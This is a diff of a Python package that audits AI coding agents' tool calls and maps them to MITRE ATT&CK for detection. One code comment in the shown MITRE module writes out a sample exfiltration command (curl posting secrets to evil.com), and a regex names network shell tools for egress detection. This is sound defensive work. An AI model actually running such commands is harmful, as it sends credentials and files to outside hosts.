agentmetry 0.4.0__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (131) hide show
  1. agentmetry/__init__.py +12 -0
  2. agentmetry/api/__init__.py +0 -0
  3. agentmetry/api/main.py +232 -0
  4. agentmetry/api/routes/__init__.py +0 -0
  5. agentmetry/api/routes/audit.py +396 -0
  6. agentmetry/api/websocket.py +53 -0
  7. agentmetry/api/ws_bridge.py +34 -0
  8. agentmetry/cli/__init__.py +941 -0
  9. agentmetry/cli/__main__.py +5 -0
  10. agentmetry/core/__init__.py +0 -0
  11. agentmetry/core/audit/__init__.py +1 -0
  12. agentmetry/core/audit/adapters/__init__.py +0 -0
  13. agentmetry/core/audit/adapters/agt.py +304 -0
  14. agentmetry/core/audit/adapters/cloudevents.py +159 -0
  15. agentmetry/core/audit/adapters/ecs.py +103 -0
  16. agentmetry/core/audit/adapters/splunk.py +40 -0
  17. agentmetry/core/audit/alerts.py +56 -0
  18. agentmetry/core/audit/canonical.py +150 -0
  19. agentmetry/core/audit/compliance_digest.py +299 -0
  20. agentmetry/core/audit/detection/__init__.py +9 -0
  21. agentmetry/core/audit/detection/benchmark.py +194 -0
  22. agentmetry/core/audit/detection/corpus/attack_approval_denied_then_executed.jsonl +3 -0
  23. agentmetry/core/audit/detection/corpus/attack_arbitrary_host_stage_execute.jsonl +3 -0
  24. agentmetry/core/audit/detection/corpus/attack_autonomous_unapproved_write.jsonl +3 -0
  25. agentmetry/core/audit/detection/corpus/attack_credential_exfil.jsonl +2 -0
  26. agentmetry/core/audit/detection/corpus/attack_credential_then_cloud_api.jsonl +2 -0
  27. agentmetry/core/audit/detection/corpus/attack_destructive_delete_burst.jsonl +6 -0
  28. agentmetry/core/audit/detection/corpus/attack_discovery_then_collect.jsonl +5 -0
  29. agentmetry/core/audit/detection/corpus/attack_dotfile_then_git_push.jsonl +2 -0
  30. agentmetry/core/audit/detection/corpus/attack_encoded_command_download.jsonl +1 -0
  31. agentmetry/core/audit/detection/corpus/attack_env_credential_exfil.jsonl +3 -0
  32. agentmetry/core/audit/detection/corpus/attack_hashed_only_no_command.jsonl +2 -0
  33. agentmetry/core/audit/detection/corpus/attack_interpreter_egress.jsonl +2 -0
  34. agentmetry/core/audit/detection/corpus/attack_pr_merged_without_review.jsonl +2 -0
  35. agentmetry/core/audit/detection/corpus/attack_proc_substitution_cradle.jsonl +2 -0
  36. agentmetry/core/audit/detection/corpus/attack_remote_pipe_to_shell.jsonl +1 -0
  37. agentmetry/core/audit/detection/corpus/attack_remote_staging_then_execute.jsonl +2 -0
  38. agentmetry/core/audit/detection/corpus/attack_session_tool_burst.jsonl +42 -0
  39. agentmetry/core/audit/detection/corpus/attack_single_command_exfil.jsonl +2 -0
  40. agentmetry/core/audit/detection/corpus/attack_ssh_directory_exfil.jsonl +3 -0
  41. agentmetry/core/audit/detection/corpus/attack_subagent_swarm.jsonl +6 -0
  42. agentmetry/core/audit/detection/corpus/attack_timestamp_collision.jsonl +2 -0
  43. agentmetry/core/audit/detection/corpus/attack_untrusted_input_then_action.jsonl +3 -0
  44. agentmetry/core/audit/detection/corpus/benign_authoring_merge_fixtures.jsonl +3 -0
  45. agentmetry/core/audit/detection/corpus/benign_autonomous_after_approval.jsonl +4 -0
  46. agentmetry/core/audit/detection/corpus/benign_build_artifact_cleanup.jsonl +5 -0
  47. agentmetry/core/audit/detection/corpus/benign_ci_artifact_download.jsonl +3 -0
  48. agentmetry/core/audit/detection/corpus/benign_database_migration.jsonl +5 -0
  49. agentmetry/core/audit/detection/corpus/benign_dependency_install_and_build.jsonl +5 -0
  50. agentmetry/core/audit/detection/corpus/benign_download_release_archive.jsonl +4 -0
  51. agentmetry/core/audit/detection/corpus/benign_fetch_data_then_run_repo_script.jsonl +3 -0
  52. agentmetry/core/audit/detection/corpus/benign_fetch_dataset_then_analyse.jsonl +3 -0
  53. agentmetry/core/audit/detection/corpus/benign_fetch_lockfile_then_install.jsonl +3 -0
  54. agentmetry/core/audit/detection/corpus/benign_git_review_and_push.jsonl +6 -0
  55. agentmetry/core/audit/detection/corpus/benign_human_driven_deletes.jsonl +6 -0
  56. agentmetry/core/audit/detection/corpus/benign_local_api_probing.jsonl +5 -0
  57. agentmetry/core/audit/detection/corpus/benign_long_but_calm_session.jsonl +30 -0
  58. agentmetry/core/audit/detection/corpus/benign_loopback_is_not_egress.jsonl +2 -0
  59. agentmetry/core/audit/detection/corpus/benign_loopback_pipe_to_interpreter.jsonl +3 -0
  60. agentmetry/core/audit/detection/corpus/benign_ordinary_development.jsonl +5 -0
  61. agentmetry/core/audit/detection/corpus/benign_package_manager_after_fetch.jsonl +2 -0
  62. agentmetry/core/audit/detection/corpus/benign_reading_config_that_is_not_secret.jsonl +5 -0
  63. agentmetry/core/audit/detection/corpus/benign_remote_api_call_no_credentials.jsonl +4 -0
  64. agentmetry/core/audit/detection/corpus/benign_research_then_docs.jsonl +5 -0
  65. agentmetry/core/audit/detection/corpus/benign_reversed_order_is_not_exfil.jsonl +2 -0
  66. agentmetry/core/audit/detection/corpus/benign_test_and_fix_loop.jsonl +6 -0
  67. agentmetry/core/audit/detection/corpus/benign_writing_about_credentials.jsonl +6 -0
  68. agentmetry/core/audit/detection/corpus/corpus.yaml +443 -0
  69. agentmetry/core/audit/detection/disposition.py +651 -0
  70. agentmetry/core/audit/detection/engine.py +78 -0
  71. agentmetry/core/audit/detection/live.py +127 -0
  72. agentmetry/core/audit/detection/live_store.py +355 -0
  73. agentmetry/core/audit/detection/models.py +53 -0
  74. agentmetry/core/audit/detection/rules.py +1314 -0
  75. agentmetry/core/audit/detection/traits.py +648 -0
  76. agentmetry/core/audit/detection/yaml_config.py +91 -0
  77. agentmetry/core/audit/detection/yaml_rules.py +83 -0
  78. agentmetry/core/audit/dlp/__init__.py +4 -0
  79. agentmetry/core/audit/dlp/loader.py +29 -0
  80. agentmetry/core/audit/dlp/models.py +29 -0
  81. agentmetry/core/audit/dlp/scanner.py +96 -0
  82. agentmetry/core/audit/dogfood.py +398 -0
  83. agentmetry/core/audit/evidence_pack.py +500 -0
  84. agentmetry/core/audit/external.py +213 -0
  85. agentmetry/core/audit/hashing.py +21 -0
  86. agentmetry/core/audit/hook_bootstrap.py +451 -0
  87. agentmetry/core/audit/identity.py +39 -0
  88. agentmetry/core/audit/ingest.py +242 -0
  89. agentmetry/core/audit/migrate.py +73 -0
  90. agentmetry/core/audit/mitre.py +244 -0
  91. agentmetry/core/audit/policy.py +99 -0
  92. agentmetry/core/audit/redaction.py +50 -0
  93. agentmetry/core/audit/replay.py +54 -0
  94. agentmetry/core/audit/run_context.py +129 -0
  95. agentmetry/core/audit/sinks.py +235 -0
  96. agentmetry/core/audit/spool.py +394 -0
  97. agentmetry/core/audit/tool_policy/__init__.py +4 -0
  98. agentmetry/core/audit/tool_policy/evaluator.py +198 -0
  99. agentmetry/core/audit/tool_policy/loader.py +44 -0
  100. agentmetry/core/audit/tool_policy/models.py +25 -0
  101. agentmetry/core/audit/trail_chain.py +300 -0
  102. agentmetry/core/audit/trail_db.py +491 -0
  103. agentmetry/core/audit/trail_merkle.py +332 -0
  104. agentmetry/core/auth.py +54 -0
  105. agentmetry/core/bus/__init__.py +5 -0
  106. agentmetry/core/bus/audit_exporter.py +107 -0
  107. agentmetry/core/bus/bridges.py +26 -0
  108. agentmetry/core/bus/bus.py +102 -0
  109. agentmetry/core/bus/events.py +50 -0
  110. agentmetry/core/bus/outbox.py +124 -0
  111. agentmetry/core/config.py +177 -0
  112. agentmetry/core/diagnostics/__init__.py +0 -0
  113. agentmetry/core/diagnostics/autostart.py +563 -0
  114. agentmetry/core/diagnostics/doctor.py +535 -0
  115. agentmetry/core/diagnostics/driver_paths.py +156 -0
  116. agentmetry/core/diagnostics/env_file.py +45 -0
  117. agentmetry/core/drivers/__init__.py +4 -0
  118. agentmetry/core/drivers/host.py +263 -0
  119. agentmetry/core/drivers/permissions.py +37 -0
  120. agentmetry/core/drivers/spec.py +118 -0
  121. agentmetry/core/extensions.py +107 -0
  122. agentmetry/core/health.py +26 -0
  123. agentmetry/core/version.py +13 -0
  124. agentmetry/policies/detection/manifest.yaml +43 -0
  125. agentmetry/policies/dlp/manifest.yaml +161 -0
  126. agentmetry/policies/opa/agent_rules.rego +33 -0
  127. agentmetry/policies/tool/manifest.yaml +117 -0
  128. agentmetry-0.4.0.dist-info/METADATA +86 -0
  129. agentmetry-0.4.0.dist-info/RECORD +131 -0
  130. agentmetry-0.4.0.dist-info/WHEEL +4 -0
  131. agentmetry-0.4.0.dist-info/entry_points.txt +2 -0
@@ -0,0 +1,39 @@
1
+ """Host and fleet identity fields on canonical events."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import socket
6
+ from functools import lru_cache
7
+
8
+ from agentmetry.core.config import settings
9
+
10
+
11
+ @lru_cache(maxsize=1)
12
+ def host_id() -> str:
13
+ """The machine name, resolved once.
14
+
15
+ This sits in the hot path: every canonical event calls it, and a busy
16
+ developer produces on the order of a thousand a day. A hostname does not
17
+ change under a running process, so resolving it per event buys nothing and
18
+ costs a syscall.
19
+ """
20
+ return socket.gethostname()
21
+
22
+
23
+ def fleet_id() -> str:
24
+ return settings.fleet_id.strip()
25
+
26
+
27
+ def identity_fields() -> dict[str, str]:
28
+ """Top-level host/fleet keys every canonical event carries.
29
+
30
+ `fleet_id` is omitted rather than emitted empty when unset. An empty string
31
+ on every event is noise in the trail and a trap in a SIEM, where
32
+ `fleet_id="*"` then matches unconfigured hosts and a `fleet_id!=""` filter
33
+ is needed to exclude them. Absent means absent.
34
+ """
35
+ fields = {"host_id": host_id()}
36
+ fleet = fleet_id()
37
+ if fleet:
38
+ fields["fleet_id"] = fleet
39
+ return fields
@@ -0,0 +1,242 @@
1
+ """Ingest external adapter events into Agentmetry sinks (Tier B)."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import logging
6
+ from typing import Any
7
+
8
+ from agentmetry.core.audit.detection.live import (
9
+ build_detection_event,
10
+ mark_detection_emitted,
11
+ mark_host_detection_emitted,
12
+ observe,
13
+ observe_host,
14
+ )
15
+ from agentmetry.core.audit.external import build_external_canonical
16
+ from agentmetry.core.audit.sinks import build_audit_sinks, parse_sink_modes
17
+ from agentmetry.core.config import settings
18
+
19
+ logger = logging.getLogger(__name__)
20
+
21
+ _sink = None
22
+
23
+ # Best-effort, in-session approval correlation (Tier B). No IDE reports "the
24
+ # human clicked approve", so we infer it: a tool that RUNS after an `ask` means
25
+ # the human approved; an `ask` still pending at session end means denied/aborted.
26
+ # Inferred events are explicitly marked `reason: inferred:*` — never presented
27
+ # as a native approval signal. In-memory only (lost on restart); approvals are
28
+ # short-lived within a session so this is acceptable for a local recorder.
29
+ _pending_approvals: dict[str, list[dict[str, str]]] = {}
30
+ _MAX_PENDING_PER_CORR = 64
31
+
32
+
33
+ def reset_ingest_sink_cache() -> None:
34
+ """Test helper — clear lazy sink singleton."""
35
+ global _sink
36
+ _sink = None
37
+
38
+
39
+ def reset_pending_approvals() -> None:
40
+ """Test helper — clear the approval-correlation state."""
41
+ _pending_approvals.clear()
42
+
43
+
44
+ def _tool_ident(canonical: dict[str, Any]) -> tuple[str, str, str]:
45
+ tool = canonical.get("tool") or {}
46
+ return (
47
+ str(tool.get("qualified") or ""),
48
+ str(tool.get("server") or ""),
49
+ str(tool.get("input_hash") or ""),
50
+ )
51
+
52
+
53
+ def _approval_matches(pending: dict[str, str], qualified: str, input_hash: str) -> bool:
54
+ """Does this executed call satisfy that pending approval?
55
+
56
+ Bind on the most specific identity both sides carry, the same precedence
57
+ rule_approval_denied_then_executed uses. When both know the argument hash
58
+ they must agree: an approval for `Bash(rm -rf /tmp/x)` must not be consumed
59
+ by a later `Bash(ls)`, or the trail claims a human approved something they
60
+ never saw. That gap between the proposed action and the one that ran is
61
+ exactly where surprises live.
62
+
63
+ Falls back to the tool name only when a hash is missing on either side,
64
+ which is the pre-hash adapter case. An approval recorded with no tool name
65
+ still matches anything, as before.
66
+ """
67
+ if pending.get("tool") and pending["tool"] != qualified:
68
+ return False
69
+ if pending.get("input_hash") and input_hash:
70
+ return pending["input_hash"] == input_hash
71
+ return True
72
+
73
+
74
+ def _approval_payload(
75
+ source_app: str, corr: str, pending: dict[str, str], outcome: str, reason: str
76
+ ) -> dict[str, Any]:
77
+ return {
78
+ "source_app": source_app,
79
+ "adapter": f"{source_app}_inferred",
80
+ "event_type": "approval_response",
81
+ "outcome": outcome,
82
+ "reason": reason,
83
+ "correlation_id": corr,
84
+ "gated_action": {
85
+ "tool": pending.get("tool", ""),
86
+ "server": pending.get("server", ""),
87
+ "input_hash": pending.get("input_hash", ""),
88
+ },
89
+ }
90
+
91
+
92
+ def infer_approval_payloads(canonical: dict[str, Any]) -> list[dict[str, Any]]:
93
+ """Return synthetic approval_response payloads inferred from the event stream."""
94
+ action = canonical.get("action") or {}
95
+ atype = action.get("type")
96
+ outcome = action.get("outcome")
97
+ corr = str(canonical.get("correlation_id") or "")
98
+ if not corr:
99
+ return []
100
+ source_app = str((canonical.get("source") or {}).get("app") or "cursor")
101
+
102
+ if atype == "approval_request" and outcome == "pending":
103
+ qualified, server, input_hash = _tool_ident(canonical)
104
+ bucket = _pending_approvals.setdefault(corr, [])
105
+ if len(bucket) < _MAX_PENDING_PER_CORR:
106
+ bucket.append({"tool": qualified, "server": server, "input_hash": input_hash})
107
+ return []
108
+
109
+ if atype == "tool_called" and outcome == "success":
110
+ bucket = _pending_approvals.get(corr) or []
111
+ qualified, _server, input_hash = _tool_ident(canonical)
112
+ for i, pending in enumerate(bucket):
113
+ if _approval_matches(pending, qualified, input_hash):
114
+ bucket.pop(i)
115
+ return [
116
+ _approval_payload(
117
+ source_app, corr, pending, "success", "inferred:tool_ran_after_ask"
118
+ )
119
+ ]
120
+ return []
121
+
122
+ if atype == "session_end":
123
+ bucket = _pending_approvals.pop(corr, [])
124
+ return [
125
+ _approval_payload(
126
+ source_app, corr, pending, "denied", "inferred:session_ended_pending"
127
+ )
128
+ for pending in bucket
129
+ ]
130
+
131
+ return []
132
+
133
+
134
+ def _get_sink():
135
+ global _sink
136
+ if _sink is not None:
137
+ return _sink
138
+ if not settings.audit_export_enabled:
139
+ return None
140
+ modes = parse_sink_modes(settings.audit_sink)
141
+ _sink = build_audit_sinks(
142
+ modes=modes,
143
+ file_path=settings.audit_export_path,
144
+ webhook_url=settings.audit_webhook_url,
145
+ webhook_timeout_seconds=settings.audit_webhook_timeout_seconds,
146
+ webhook_format=settings.audit_webhook_format,
147
+ elastic_url=settings.audit_elastic_url,
148
+ elastic_index=settings.audit_elastic_index,
149
+ elastic_api_key=settings.audit_elastic_api_key,
150
+ elastic_verify_tls=settings.audit_elastic_verify_tls,
151
+ splunk_hec_url=settings.audit_splunk_hec_url,
152
+ splunk_hec_token=settings.audit_splunk_hec_token,
153
+ splunk_index=settings.audit_splunk_index,
154
+ splunk_sourcetype=settings.audit_splunk_sourcetype,
155
+ splunk_verify_tls=settings.audit_splunk_verify_tls,
156
+ )
157
+ from agentmetry.core.audit.alerts import AlertWebhookSink
158
+ from agentmetry.core.audit.sinks import MultiAuditSink
159
+
160
+ if settings.audit_alert_webhook_url.strip():
161
+ alert_sink = AlertWebhookSink(
162
+ settings.audit_alert_webhook_url.strip(),
163
+ timeout_seconds=settings.audit_webhook_timeout_seconds,
164
+ )
165
+ if _sink is None:
166
+ _sink = alert_sink
167
+ elif isinstance(_sink, MultiAuditSink):
168
+ _sink._sinks.append(alert_sink)
169
+ else:
170
+ _sink = MultiAuditSink([_sink, alert_sink])
171
+
172
+ return _sink
173
+ async def ingest_external_event(payload: dict[str, Any]) -> dict[str, Any]:
174
+ """Validate adapter payload, build canonical event, forward to configured sinks."""
175
+ if not settings.audit_ingest_enabled:
176
+ raise ValueError("External audit ingest is disabled")
177
+
178
+ canonical = build_external_canonical(payload)
179
+
180
+ # 1. Durable indexed store (query backend)
181
+ from agentmetry.core.audit.trail_db import get_trail_db
182
+ get_trail_db().insert(canonical)
183
+
184
+ # 2. Forward to configured sinks (JSONL file, webhook, Elastic, Splunk)
185
+ sink = _get_sink()
186
+ if sink is None:
187
+ raise RuntimeError("No audit sinks configured")
188
+
189
+ await sink.emit(canonical)
190
+
191
+ # Emit any inferred approval_response events derived from the stream.
192
+ inferred: list[dict[str, Any]] = []
193
+ for extra_payload in infer_approval_payloads(canonical):
194
+ extra = build_external_canonical(extra_payload)
195
+ inferred.append(extra)
196
+ get_trail_db().insert(extra)
197
+ await sink.emit(extra)
198
+
199
+ # Correlate as events arrive. A detection that only surfaces when someone
200
+ # opens the session in the dashboard is not a control — emit it down the
201
+ # same sinks so it reaches the SIEM and the alert webhook.
202
+ pending_detections: list[tuple[Any, dict[str, Any], str, str, str]] = []
203
+ for event in (canonical, *inferred):
204
+ corr = str(event.get("correlation_id") or "")
205
+ host_id = str(event.get("host_id") or "")
206
+ ts = str(event.get("timestamp_utc") or "")
207
+ for detection in (*observe(event), *observe_host(event)):
208
+ pending_detections.append((detection, event, corr, host_id, ts))
209
+
210
+ for detection, event, corr, host_id, ts in pending_detections:
211
+ det_event = build_detection_event(detection, event)
212
+ try:
213
+ # The trail insert is the durability guarantee: it raises on a local
214
+ # write failure and the rule stays un-checkpointed, so it re-fires on
215
+ # the next event. Network sinks (webhook/Elastic/Splunk/Loki) swallow
216
+ # their own errors, so a down SIEM does NOT raise here and does not
217
+ # block the checkpoint — forwarding is best-effort, the local trail
218
+ # is the source of truth.
219
+ get_trail_db().insert(det_event)
220
+ await sink.emit(det_event)
221
+ except Exception:
222
+ logger.exception("Failed to emit detection %s", detection.rule_id)
223
+ continue
224
+ if detection.rule_id.startswith("host-"):
225
+ mark_host_detection_emitted(host_id, detection.rule_id, emitted_at=ts)
226
+ else:
227
+ mark_detection_emitted(corr, detection.rule_id, emitted_at=ts)
228
+ logger.warning(
229
+ "DETECTION %s [%s] correlation=%s — %s",
230
+ detection.rule_id,
231
+ detection.severity,
232
+ detection.correlation_id,
233
+ detection.summary,
234
+ )
235
+
236
+ logger.info(
237
+ "Ingested external audit event app=%s type=%s correlation=%s",
238
+ (canonical.get("source") or {}).get("app"),
239
+ (canonical.get("action") or {}).get("type"),
240
+ canonical.get("correlation_id"),
241
+ )
242
+ return canonical
@@ -0,0 +1,73 @@
1
+ """Backfill the SQLite query store from the existing JSONL trail.
2
+
3
+ Runs once on startup. Every failure mode here is non-fatal by design: the JSONL
4
+ trail is the durable record and the DB is a query index, so a broken index must
5
+ never stop the recorder from booting.
6
+ """
7
+
8
+ from __future__ import annotations
9
+
10
+ import json
11
+ import logging
12
+ from pathlib import Path
13
+
14
+ from agentmetry.core.audit.trail_db import get_trail_db
15
+ from agentmetry.core.config import settings
16
+
17
+ logger = logging.getLogger(__name__)
18
+
19
+ _BATCH = 1000
20
+
21
+
22
+ def backfill_db_from_jsonl() -> int:
23
+ """Insert any JSONL events missing from the DB. Returns rows inserted.
24
+
25
+ Idempotent: insert_batch uses INSERT OR IGNORE against a UNIQUE event_id, so
26
+ re-running costs a scan and inserts nothing new. That is why this no longer
27
+ returns early when the DB is non-empty. The previous version did, which meant
28
+ a crash part-way through the first backfill left the DB permanently and
29
+ silently partial: every later start saw rows, assumed the job was done, and
30
+ the rest of the trail was never queryable.
31
+ """
32
+ jsonl_path = Path(settings.audit_export_path)
33
+ if not jsonl_path.is_file():
34
+ return 0
35
+
36
+ try:
37
+ db = get_trail_db()
38
+ except Exception:
39
+ logger.exception("Audit DB unavailable; skipping backfill (JSONL trail unaffected)")
40
+ return 0
41
+
42
+ total = 0
43
+ batch: list[dict] = []
44
+ try:
45
+ with jsonl_path.open("r", encoding="utf-8", errors="replace") as fh:
46
+ for line in fh:
47
+ line = line.strip()
48
+ if not line:
49
+ continue
50
+ try:
51
+ raw = json.loads(line)
52
+ except json.JSONDecodeError:
53
+ continue
54
+ if not isinstance(raw, dict):
55
+ continue
56
+ from agentmetry.core.audit.trail_chain import unwrap_trail_record
57
+
58
+ event = unwrap_trail_record(raw)
59
+ batch.append(event)
60
+ if len(batch) >= _BATCH:
61
+ total += db.insert_batch(batch)
62
+ batch.clear()
63
+ if batch:
64
+ total += db.insert_batch(batch)
65
+ except Exception as exc:
66
+ logger.warning(
67
+ "Audit trail backfill stopped early (%s); the JSONL trail is unaffected", exc
68
+ )
69
+ return total
70
+
71
+ if total:
72
+ logger.info("Audit trail backfill inserted %d new event(s)", total)
73
+ return total
@@ -0,0 +1,244 @@
1
+ """MITRE ATT&CK mapping for agent tool activity.
2
+
3
+ Two layers:
4
+ 1. Tool -> technique: what kind of action the tool performs (by tool name).
5
+ 2. Content upgrade: if the evidence (command / arguments) touches a sensitive
6
+ target, upgrade to a higher-signal technique — e.g. reading a private key
7
+ is Credential Access (T1552), not generic Collection (T1005). This is the
8
+ signal a SOC actually pays for; it only fires on the Tier B path where the
9
+ command/args are available (Tier A stores hashes only).
10
+
11
+ Structured IDs are stored so a SIEM can pivot on `technique_id`; human labels
12
+ stay for display.
13
+ """
14
+
15
+ from __future__ import annotations
16
+
17
+ import json
18
+ import re
19
+ from typing import Any
20
+
21
+
22
+ def _m(tactic_id: str, tactic: str, technique_id: str, technique: str) -> dict[str, str]:
23
+ return {
24
+ "tactic_id": tactic_id,
25
+ "tactic": tactic,
26
+ "technique_id": technique_id,
27
+ "technique": technique,
28
+ }
29
+
30
+
31
+ def _norm(name: str) -> str:
32
+ """Fold a tool method to a comparable key.
33
+
34
+ IDE agents spell the same action three different ways — Cursor ships
35
+ `SearchAndReplace`, Claude ships `WebFetch`, our drivers ship `read_file`.
36
+ Dropping case and separators means one entry covers all spellings; without
37
+ this, `web_search` matched but `WebSearch` silently did not, and an unmapped
38
+ network call means the credential-exfil rule can never fire.
39
+ """
40
+ return name.lower().replace("_", "").replace("-", "")
41
+
42
+
43
+ _EXECUTION = _m("TA0002", "Execution", "T1059", "Command and Scripting Interpreter")
44
+ _COLLECTION = _m("TA0009", "Collection", "T1005", "Data from Local System")
45
+ _DISCOVERY = _m("TA0007", "Discovery", "T1083", "File and Directory Discovery")
46
+ _MANIPULATION = _m("TA0040", "Impact", "T1565", "Data Manipulation")
47
+ _DESTRUCTION = _m("TA0040", "Impact", "T1485", "Data Destruction")
48
+ _C2 = _m("TA0011", "Command and Control", "T1071.001", "Web Protocols")
49
+
50
+ # Normalized tool method -> technique. Keys are _norm()'d at build time.
51
+ _TOOL_MAP: dict[str, dict[str, str]] = {
52
+ _norm(k): v
53
+ for k, v in {
54
+ # Execution
55
+ "run_command": _EXECUTION,
56
+ "run_terminal_cmd": _EXECUTION,
57
+ "run": _EXECUTION, # shell.run
58
+ "run_shell": _EXECUTION, # opensre
59
+ "shell": _EXECUTION,
60
+ "shell_exec": _EXECUTION,
61
+ "execute_command": _EXECUTION,
62
+ "exec": _EXECUTION,
63
+ "terminal": _EXECUTION,
64
+ "bash": _m("TA0002", "Execution", "T1059.004", "Unix Shell"),
65
+ "powershell": _m("TA0002", "Execution", "T1059.001", "PowerShell"),
66
+ # Collection
67
+ "read_file": _COLLECTION,
68
+ "read_note": _COLLECTION,
69
+ "view_file": _COLLECTION,
70
+ "read": _COLLECTION,
71
+ "grep_search": _COLLECTION,
72
+ "grep": _COLLECTION,
73
+ "codebase_search": _COLLECTION,
74
+ "search": _COLLECTION,
75
+ # Discovery
76
+ "list_dir": _DISCOVERY,
77
+ "glob": _DISCOVERY,
78
+ "ls": _DISCOVERY,
79
+ "find": _DISCOVERY,
80
+ # Impact / Manipulation
81
+ "write_file": _MANIPULATION,
82
+ "write_to_file": _MANIPULATION,
83
+ "write": _MANIPULATION,
84
+ "edit_file": _MANIPULATION,
85
+ "edit": _MANIPULATION,
86
+ "multi_edit": _MANIPULATION, # Claude MultiEdit
87
+ "search_and_replace": _MANIPULATION, # Cursor SearchAndReplace
88
+ "notebook_edit": _MANIPULATION,
89
+ "replace_file_content": _MANIPULATION,
90
+ "multi_replace_file_content": _MANIPULATION,
91
+ # Impact / Destruction — the highest-severity impact; must not be missed.
92
+ "delete_file": _DESTRUCTION,
93
+ "delete": _DESTRUCTION, # cursor.Delete
94
+ "remove": _DESTRUCTION,
95
+ # Command & Control / network egress. TA0011 here is what lets the
96
+ # credential-exfil sequence rule fire, so keep this list generous.
97
+ "curl": _C2,
98
+ "wget": _C2,
99
+ "fetch": _C2,
100
+ "web_fetch": _C2, # Claude WebFetch
101
+ "web_search": _C2, # Claude WebSearch
102
+ "http_request": _C2,
103
+ }.items()
104
+ }
105
+
106
+ # Content upgrades — fire on evidence text, highest-signal first.
107
+ # (Exfil is a *sequence* signal — a read followed by network egress — and lives
108
+ # in the detection rules, not in per-event tagging.)
109
+ _CREDENTIAL_ACCESS = _m("TA0006", "Credential Access", "T1552.001", "Credentials In Files")
110
+ _PRIVATE_KEY = _m("TA0006", "Credential Access", "T1552.004", "Private Keys")
111
+
112
+ # Credential and private-key recognition now lives in detection/traits.py, and
113
+ # this module imports it rather than keeping a second copy.
114
+ #
115
+ # It used to keep its own tuple of substrings matched with `p in text`. That is
116
+ # how `agentmetry.core.diagnostics.env_file` earned T1552.001 (#40): the tuple
117
+ # contained a bare ".env". Worse than the false positive was the shape of the
118
+ # bug. Two classifiers were answering "is this credential access" from
119
+ # different data -- `classify_command` said no traits, the mapper said
120
+ # T1552.001 -- and the sequence rules keyed off the mapper, the one with less
121
+ # information and no test corpus. A disagreement between them was not merely
122
+ # possible, it was undetectable.
123
+ from agentmetry.core.audit.detection.traits import ( # noqa: E402
124
+ CREDENTIAL_ENV,
125
+ CREDENTIAL_ENV_DUMP,
126
+ CREDENTIAL_PATH,
127
+ ENV_FILE,
128
+ INTERPRETER_NETWORK,
129
+ PRIVATE_KEY_PATH,
130
+ mask_literals,
131
+ )
132
+
133
+ # Shell-wrapped network egress. `bash: curl -d @secrets https://evil.com` is a
134
+ # network connection, so it is Command and Control, not merely Execution. The
135
+ # tool name alone cannot see this: the tool is "Bash", and the egress lives in
136
+ # the arguments. Without this, the most common exfil path (curl from a shell)
137
+ # never earns TA0011 and the credential-exfil sequence rule cannot fire.
138
+ #
139
+ # This tags a *fact* about one event (it talked to the network). Exfiltration
140
+ # itself stays a sequence signal, decided by the detection rules.
141
+ _NETWORK_CLIENT = re.compile(
142
+ r"\b(curl|wget|iwr|invoke-webrequest|invoke-restmethod|nc|netcat|scp|rsync|ftp|telnet)\b"
143
+ )
144
+ _URL_HOST = re.compile(r"https?://(?:[^\s/@'\"]*@)?([^\s/:'\"]+)")
145
+ _BARE_IP = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
146
+ # Loopback is not egress. Hitting your own health endpoint is the single most
147
+ # common thing a developer does while running this tool, and tagging it
148
+ # Command and Control buries the one event that matters under a hundred that
149
+ # don't. Anything off the box still counts, including the LAN: exfil to the
150
+ # machine next to you is still exfil.
151
+ _LOOPBACK = re.compile(r"^(?:localhost|127(?:\.\d{1,3}){3}|0\.0\.0\.0|\[?::1\]?)$")
152
+ _C2 = _m("TA0011", "Command and Control", "T1071.001", "Web Protocols")
153
+
154
+
155
+ def _reaches_remote_host(text: str) -> bool:
156
+ """True when the command names a target that is not this machine."""
157
+ hosts = _URL_HOST.findall(text) + _BARE_IP.findall(text)
158
+ return any(not _LOOPBACK.match(host) for host in hosts)
159
+
160
+
161
+ def _shell_text(evidence: Any) -> str | None:
162
+ """The shell command inside `evidence`, or None if this is not shell text.
163
+
164
+ Masking is a statement about *shell* quoting, and applying it to anything
165
+ else is actively wrong. `_evidence_text` returns JSON for dict evidence,
166
+ where the entire command sits inside double quotes -- masking that blanks
167
+ the whole string and every content rule silently stops matching. A tool call
168
+ carrying `{"path": "~/.aws/credentials"}` has no shell quoting to reason
169
+ about either, and its quotes are JSON syntax rather than an author's intent.
170
+
171
+ So: mask when we have a command, and only then.
172
+ """
173
+ if isinstance(evidence, str):
174
+ return evidence
175
+ if isinstance(evidence, dict):
176
+ command = evidence.get("command")
177
+ if isinstance(command, str) and command:
178
+ return command
179
+ return None
180
+
181
+
182
+ def _evidence_text(evidence: Any) -> str:
183
+ if not evidence:
184
+ return ""
185
+ if isinstance(evidence, str):
186
+ return evidence.lower()
187
+ try:
188
+ return json.dumps(evidence, default=str).lower()
189
+ except Exception:
190
+ return str(evidence).lower()
191
+
192
+
193
+ def get_mitre_mapping(
194
+ tool_qualified: str, evidence: Any = None
195
+ ) -> dict[str, str] | None:
196
+ """Return the MITRE tactic/technique for a tool call.
197
+
198
+ `evidence` (command string or args) is optional; when present it can upgrade
199
+ the mapping to a higher-signal technique (credential access, exfil).
200
+ """
201
+ text = _evidence_text(evidence)
202
+
203
+ # 1. Content upgrades win — a read that touches a key is credential access,
204
+ # not generic collection.
205
+ if text:
206
+ # Same masking policy as classify_command: paths may be double-quoted
207
+ # and still be real, but a path inside single quotes or a heredoc is
208
+ # text somebody is writing, not a file somebody is reading. Structured
209
+ # evidence is not masked at all -- see _shell_text.
210
+ shell = _shell_text(evidence)
211
+ literal = mask_literals(shell, include_double=False).lower() if shell else text
212
+ written = mask_literals(shell).lower() if shell else text
213
+ if PRIVATE_KEY_PATH.search(literal):
214
+ return _PRIVATE_KEY
215
+ if (
216
+ CREDENTIAL_PATH.search(literal)
217
+ or ENV_FILE.search(literal)
218
+ or CREDENTIAL_ENV.search(text)
219
+ or CREDENTIAL_ENV_DUMP.search(written)
220
+ ):
221
+ return _CREDENTIAL_ACCESS
222
+ # A shell that reaches the network is C2, whatever the tool is called.
223
+ # An interpreter counts: `python -c "urllib.request.urlopen(...)"` is a
224
+ # network client, and in a container it is often the only one installed.
225
